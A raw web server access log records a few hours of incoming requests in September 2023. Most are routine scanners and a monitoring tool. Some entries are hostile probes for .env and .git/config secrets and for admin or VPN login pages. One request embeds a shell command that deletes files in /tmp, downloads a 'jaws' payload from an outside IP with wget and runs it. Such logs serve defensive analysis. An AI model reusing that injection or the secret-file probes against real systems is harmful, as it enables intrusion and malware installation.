162.216.149.40 - - [04/Sep/2023:04:30:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
64.62.197.159 - - [04/Sep/2023:04:30:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0"
184.105.247.254 - - [04/Sep/2023:04:30:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
184.105.247.196 - - [04/Sep/2023:04:30:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
181.192.2.173 - - [04/Sep/2023:04:31:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
64.62.197.153 - - [04/Sep/2023:04:31:37 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
184.105.247.196 - - [04/Sep/2023:04:32:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
64.62.197.157 - - [04/Sep/2023:04:32:14 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0"
184.105.247.254 - - [04/Sep/2023:04:32:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
184.105.247.196 - - [04/Sep/2023:04:33:00 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
184.105.247.254 - - [04/Sep/2023:04:33:25 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
179.49.141.162 - - [04/Sep/2023:04:36:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.224.128.142 - - [04/Sep/2023:04:36:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.142 - - [04/Sep/2023:04:41:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
107.170.239.4 - - [04/Sep/2023:04:41:21 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.239.4 - - [04/Sep/2023:04:41:23 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.239.4 - - [04/Sep/2023:04:41:30 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.239.4 - - [04/Sep/2023:04:41:33 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
162.243.39.32 - - [04/Sep/2023:04:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
107.170.239.4 - - [04/Sep/2023:04:42:27 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.239.4 - - [04/Sep/2023:04:42:33 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.239.4 - - [04/Sep/2023:04:42:45 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.51 - - [04/Sep/2023:04:42:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
107.170.239.4 - - [04/Sep/2023:04:43:00 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.239.4 - - [04/Sep/2023:04:43:02 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.239.4 - - [04/Sep/2023:04:43:04 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.4 - - [04/Sep/2023:04:47:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.128.19.58 - - [04/Sep/2023:04:47:44 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.128.205 - - [04/Sep/2023:04:54:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.105.128.12 - - [04/Sep/2023:04:54:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
92.118.39.40 - - [04/Sep/2023:04:55:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.11.51 - - [04/Sep/2023:04:55:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.216.149.54 - - [04/Sep/2023:04:55:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
85.31.45.34 - - [04/Sep/2023:04:56:20 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:04:56:20 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.224.128.142 - - [04/Sep/2023:04:57:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
66.175.213.4 - - [04/Sep/2023:04:57:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.31.45.34 - - [04/Sep/2023:04:57:26 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:04:57:27 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
178.128.19.58 - - [04/Sep/2023:04:58:21 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
85.31.45.34 - - [04/Sep/2023:04:59:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:04:59:10 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
159.203.44.105 - - [04/Sep/2023:05:00:02 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
159.203.44.105 - - [04/Sep/2023:05:00:24 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
159.203.44.105 - - [04/Sep/2023:05:00:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
85.31.45.34 - - [04/Sep/2023:05:00:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:00:47 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:02:18 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:02:18 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
172.104.11.4 - - [04/Sep/2023:05:02:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.31.45.34 - - [04/Sep/2023:05:02:56 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:02:56 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:04:26 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:04:27 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.79.181.179 - - [04/Sep/2023:05:04:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.31.45.34 - - [04/Sep/2023:05:04:57 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:05:03 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.178.228.36 - - [04/Sep/2023:05:07:42 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
206.189.18.182 - - [04/Sep/2023:05:08:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
206.189.18.182 - - [04/Sep/2023:05:08:28 +0200] "Gh0st\xad" 501 321 "-" "-"
206.189.18.182 - - [04/Sep/2023:05:08:31 +0200] "HELP" 501 319 "-" "-"
206.189.18.182 - - [04/Sep/2023:05:08:31 +0200] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc" 501 350 "-" "-"
206.189.18.182 - - [04/Sep/2023:05:08:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
206.189.18.182 - - [04/Sep/2023:05:08:34 +0200] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff" 400 329 "-" "-"
101.36.118.36 - - [04/Sep/2023:05:09:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
152.32.239.235 - - [04/Sep/2023:05:09:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
101.36.122.154 - - [04/Sep/2023:05:09:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.11.46 - - [04/Sep/2023:05:10:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.249.246.171 - - [04/Sep/2023:05:11:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
193.35.18.27 - - [04/Sep/2023:05:11:20 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
193.35.18.27 - - [04/Sep/2023:05:11:20 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
193.35.18.27 - - [04/Sep/2023:05:12:02 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
198.235.24.171 - - [04/Sep/2023:05:12:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.142 - - [04/Sep/2023:05:15:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
178.128.19.58 - - [04/Sep/2023:05:15:23 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.35.18.27 - - [04/Sep/2023:05:17:16 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
193.35.18.27 - - [04/Sep/2023:05:21:59 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
193.35.18.27 - - [04/Sep/2023:05:22:34 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
45.79.128.205 - - [04/Sep/2023:05:23:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.35.18.27 - - [04/Sep/2023:05:28:57 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
157.245.69.67 - - [04/Sep/2023:05:36:28 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
157.245.69.67 - - [04/Sep/2023:05:36:50 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
157.245.69.67 - - [04/Sep/2023:05:37:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
85.31.45.34 - - [04/Sep/2023:05:38:50 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:38:50 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.106.29.122 - - [04/Sep/2023:05:40:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
193.35.18.27 - - [04/Sep/2023:05:40:19 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
205.210.31.86 - - [04/Sep/2023:05:42:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
85.31.45.34 - - [04/Sep/2023:05:44:15 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
85.31.45.34 - - [04/Sep/2023:05:44:16 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.35.18.27 - - [04/Sep/2023:05:50:36 +0200] "CONNECT create.roblox.com:443 HTTP/1.1" 405 347 "-" "Go-http-client/1.1"
185.224.128.142 - - [04/Sep/2023:05:53:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
162.216.150.11 - - [04/Sep/2023:05:59:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.167.124.130 - - [04/Sep/2023:06:08:37 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 5.253.246.16/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
3.9.174.214 - - [04/Sep/2023:06:11:42 +0200] "" 501 315 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:12:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:13:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:13:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.9.174.214 - - [04/Sep/2023:06:14:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:14:52 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.9.174.214 - - [04/Sep/2023:06:15:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:16:12 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.9.174.214 - - [04/Sep/2023:06:16:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:17:27 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.9.174.214 - - [04/Sep/2023:06:18:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:18:48 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.9.174.214 - - [04/Sep/2023:06:19:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:20:03 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.9.174.214 - - [04/Sep/2023:06:20:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.9.174.214 - - [04/Sep/2023:06:21:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
198.235.24.254 - - [04/Sep/2023:06:24:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
103.14.26.208 - - [04/Sep/2023:06:25:31 +0200] "GET /restore.php HTTP/1.1" 404 316 "-" "-"
35.176.148.41 - - [04/Sep/2023:06:31:42 +0200] "" 501 315 "-" "-"
35.176.148.41 - - [04/Sep/2023:06:32:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
151.235.238.96 - - [04/Sep/2023:06:32:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
151.235.238.96 - - [04/Sep/2023:06:32:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
200.59.9.13 - - [04/Sep/2023:06:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.33.80.243 - - [04/Sep/2023:06:34:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
35.176.148.41 - - [04/Sep/2023:06:35:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.148.41 - - [04/Sep/2023:06:36:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.148.41 - - [04/Sep/2023:06:38:23 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.148.41 - - [04/Sep/2023:06:39:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.148.41 - - [04/Sep/2023:06:41:11 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.148.41 - - [04/Sep/2023:06:42:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.148.41 - - [04/Sep/2023:06:43:40 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.148.41 - - [04/Sep/2023:06:45:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.179 - - [04/Sep/2023:06:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
35.176.148.41 - - [04/Sep/2023:06:46:19 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.148.41 - - [04/Sep/2023:06:47:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.148.41 - - [04/Sep/2023:06:48:53 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.148.41 - - [04/Sep/2023:06:50:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.148.41 - - [04/Sep/2023:06:51:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
184.105.247.252 - - [04/Sep/2023:06:53:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.25 - - [04/Sep/2023:06:55:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
194.165.16.37 - - [04/Sep/2023:06:55:42 +0200] "\x03" 501 316 "-" "-"
193.106.29.122 - - [04/Sep/2023:06:59:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Sep/2023:07:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Sep/2023:07:14:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Sep/2023:07:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.233 - - [04/Sep/2023:07:15:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
212.91.246.72 - - [04/Sep/2023:07:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.234 - - [04/Sep/2023:07:16:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
18.133.246.111 - - [04/Sep/2023:07:16:37 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
